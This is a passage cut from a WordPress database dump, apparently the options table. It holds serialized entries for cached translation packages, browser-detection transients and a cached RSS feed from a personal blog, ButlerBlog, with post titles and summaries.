14:48:56\";s:12:\"english_name\";s:8:\"Romanian\";s:11:\"native_name\";s:8:\"Română\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/ro_RO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ro\";i:2;s:3:\"ron\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuă\";}}s:5:\"ru_RU\";a:8:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 16:19:48\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/ru_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ru\";i:2;s:3:\"rus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продолжить\";}}s:5:\"sk_SK\";a:8:{s:8:\"language\";s:5:\"sk_SK\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 16:23:44\";s:12:\"english_name\";s:6:\"Slovak\";s:11:\"native_name\";s:11:\"Slovenčina\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/sk_SK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sk\";i:2;s:3:\"slk\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Pokračovať\";}}s:5:\"sl_SI\";a:8:{s:8:\"language\";s:5:\"sl_SI\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 16:25:46\";s:12:\"english_name\";s:9:\"Slovenian\";s:11:\"native_name\";s:13:\"Slovenščina\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/sl_SI.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sl\";i:2;s:3:\"slv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Nadaljujte\";}}s:2:\"sq\";a:8:{s:8:\"language\";s:2:\"sq\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-04-20 08:33:09\";s:12:\"english_name\";s:8:\"Albanian\";s:11:\"native_name\";s:5:\"Shqip\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.8/sq.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sq\";i:2;s:3:\"sqi\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Vazhdo\";}}s:5:\"sr_RS\";a:8:{s:8:\"language\";s:5:\"sr_RS\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 16:30:35\";s:12:\"english_name\";s:7:\"Serbian\";s:11:\"native_name\";s:23:\"Српски језик\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/sr_RS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sr\";i:2;s:3:\"srp\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:14:\"Настави\";}}s:5:\"sv_SE\";a:8:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-08-25 16:13:32\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/sv_SE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sv\";i:2;s:3:\"swe\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Fortsätt\";}}s:2:\"th\";a:8:{s:8:\"language\";s:2:\"th\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-27 00:00:51\";s:12:\"english_name\";s:4:\"Thai\";s:11:\"native_name\";s:9:\"ไทย\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.8/th.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"th\";i:2;s:3:\"tha\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"ต่อไป\";}}s:5:\"tr_TR\";a:8:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-07-24 13:30:08\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/tr_TR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tr\";i:2;s:3:\"tur\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Devam\";}}s:5:\"ug_CN\";a:8:{s:8:\"language\";s:5:\"ug_CN\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 16:45:38\";s:12:\"english_name\";s:6:\"Uighur\";s:11:\"native_name\";s:9:\"Uyƣurqə\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/ug_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ug\";i:2;s:3:\"uig\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:26:\"داۋاملاشتۇرۇش\";}}s:2:\"uk\";a:8:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-04-10 12:55:55\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.8/uk.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"uk\";i:2;s:3:\"ukr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продовжити\";}}s:5:\"zh_TW\";a:8:{s:8:\"language\";s:5:\"zh_TW\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-08-08 11:59:20\";s:12:\"english_name\";s:16:\"Chinese (Taiwan)\";s:11:\"native_name\";s:12:\"繁體中文\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/zh_TW.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"繼續\";}}s:5:\"zh_CN\";a:8:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:5:\"4.1.4\";s:7:\"updated\";s:19:\"2015-04-23 15:23:08\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.4/zh_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"继续\";}}}','yes'),(13482,'_site_transient_timeout_browser_6d44eab61dcf5b1f0e6fa8f6595ee1bc','1458243900','yes'),(13485,'_site_transient_browser_6d44eab61dcf5b1f0e6fa8f6595ee1bc','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:17:\"Internet Explorer\";s:7:\"version\";s:2:\"11\";s:10:\"update_url\";s:51:\"http://www.microsoft.com/windows/internet-explorer/\";s:7:\"img_src\";s:45:\"http://s.wordpress.org/images/browsers/ie.png\";s:11:\"img_src_ssl\";s:44:\"https://wordpress.org/images/browsers/ie.png\";s:15:\"current_version\";s:1:\"9\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(14082,'_site_transient_timeout_browser_06d3d9617a2883877c8f5e774e52c741','1458580592','yes'),(14085,'_site_transient_browser_06d3d9617a2883877c8f5e774e52c741','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"48.0.2564.116\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(16506,'_site_transient_timeout_browser_1b39d7d1d62ac4d2b3dc7459ef7d1588','1459884149','yes'),(16509,'_site_transient_browser_1b39d7d1d62ac4d2b3dc7459ef7d1588','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"49.0.2623.87\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(17048,'_site_transient_timeout_browser_52a2cd36b87d835241c7323e60dc2b06','1460048065','yes'),(17051,'_site_transient_browser_52a2cd36b87d835241c7323e60dc2b06','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"49.0.2623.110\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(19001,'_site_transient_timeout_browser_074dc49d992c364cc2f7401004e5360a','1460566110','yes'),(19004,'_site_transient_browser_074dc49d992c364cc2f7401004e5360a','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:17:\"Internet Explorer\";s:7:\"version\";s:4:\"10.0\";s:10:\"update_url\";s:51:\"http://www.microsoft.com/windows/internet-explorer/\";s:7:\"img_src\";s:45:\"http://s.wordpress.org/images/browsers/ie.png\";s:11:\"img_src_ssl\";s:44:\"https://wordpress.org/images/browsers/ie.png\";s:15:\"current_version\";s:1:\"9\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(23514,'_site_transient_timeout_browser_417e1e24fa1f00dc5b43465abbe2bbda','1462815854','yes'),(23517,'_site_transient_browser_417e1e24fa1f00dc5b43465abbe2bbda','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"49.0.2623.112\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(24390,'_site_transient_timeout_browser_6cec41836a02a95621586fbbfaf7cecf','1463158361','yes'),(24393,'_site_transient_browser_6cec41836a02a95621586fbbfaf7cecf','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"50.0.2661.94\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(25374,'_transient_timeout_feed_2c2fe0099a2578688413800ea68677d6','1463039701','no'),(25377,'_transient_feed_2c2fe0099a2578688413800ea68677d6','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:49:\"\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"ButlerBlog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"http://www.butlerblog.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"chad butler\'s weblog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 03 Mar 2016 20:26:25 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wordpress.org/?v=4.4.2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:36:\"\n \n \n \n \n \n \n\n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"A Great Way to Get Free Gold\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://feedproxy.google.com/~r/butlerblog/~3/ijf0cDmn5Ek/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"http://www.butlerblog.com/2016/02/03/free-gold/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 03 Feb 2016 15:24:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Editorial\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://www.butlerblog.com/?p=3518\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1773:\"Who doesn’t like free? What’s better than free? Free without a catch. Nobody likes fine print and unrealistic hurdles to overcome. So with that in mind, consider this – Free...<br/>\n<br/>\n[[ This is a content summary only. Visit my website for full links, other content, and more! ]]<div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=ijf0cDmn5Ek:qrAHf60MP9I:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=ijf0cDmn5Ek:qrAHf60MP9I:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=ijf0cDmn5Ek:qrAHf60MP9I:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=ijf0cDmn5Ek:qrAHf60MP9I:dnMXMwOfBR0\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=dnMXMwOfBR0\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=ijf0cDmn5Ek:qrAHf60MP9I:F7zBnMyn0Lo\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=ijf0cDmn5Ek:qrAHf60MP9I:F7zBnMyn0Lo\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=ijf0cDmn5Ek:qrAHf60MP9I:7Q72WNTAKBA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=7Q72WNTAKBA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=ijf0cDmn5Ek:qrAHf60MP9I:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=ijf0cDmn5Ek:qrAHf60MP9I:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=ijf0cDmn5Ek:qrAHf60MP9I:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/butlerblog/~4/ijf0cDmn5Ek\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Chad Butler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"http://www.butlerblog.com/2016/02/03/free-gold/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"http://www.butlerblog.com/2016/02/03/free-gold/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:51:\"\n \n \n \n \n \n \n \n \n \n \n \n\n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"5 Articles to Help You Manage WordPress Better\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://feedproxy.google.com/~r/butlerblog/~3/-HQU00er-qs/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"http://www.butlerblog.com/2015/06/11/articles-to-help-you-manage-wordpress-better/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 11 Jun 2015 15:59:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:6:{i:0;a:5:{s:4:\"data\";s:13:\"Blogging Tips\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:9:\"WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:8:\"blogging\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:6:\"design\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:11:\"development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:4:\"tips\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://www.butlerblog.com/?p=3436\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1776:\"Here are some posts that I have done on the site to help you manage WordPress better. Maybe you’re a writer or designer, and not a developer. Then you are in luck! These posts are to help the...<br/>\n<br/>\n[[ This is a content summary only. Visit my website for full links, other content, and more! ]]<div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=-HQU00er-qs:sLeSOeyZpBU:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=-HQU00er-qs:sLeSOeyZpBU:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=-HQU00er-qs:sLeSOeyZpBU:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=-HQU00er-qs:sLeSOeyZpBU:dnMXMwOfBR0\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=dnMXMwOfBR0\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=-HQU00er-qs:sLeSOeyZpBU:F7zBnMyn0Lo\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=-HQU00er-qs:sLeSOeyZpBU:F7zBnMyn0Lo\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=-HQU00er-qs:sLeSOeyZpBU:7Q72WNTAKBA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=7Q72WNTAKBA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=-HQU00er-qs:sLeSOeyZpBU:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=-HQU00er-qs:sLeSOeyZpBU:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=-HQU00er-qs:sLeSOeyZpBU:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/butlerblog/~4/-HQU00er-qs\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Chad Butler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"http://www.butlerblog.com/2015/06/11/articles-to-help-you-manage-wordpress-better/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"http://www.butlerblog.com/2015/06/11/articles-to-help-you-manage-wordpress-better/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:54:\"\n \n \n \n \n \n \n \n \n \n \n \n \n\n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"Don’t Let This Mistake Kill Your Business\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://feedproxy.google.com/~r/butlerblog/~3/AFPMDwe6Lv8/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"http://www.butlerblog.com/2015/06/04/dont-let-this-mistake-kill-your-business/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 04 Jun 2015 14:00:02 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:7:{i:0;a:5:{s:4:\"data\";s:13:\"Blogging Tips\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:9:\"Editorial\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:8:\"blogging\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:17:\"content-marketing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:4:\"fear\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:9:\"freelance\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"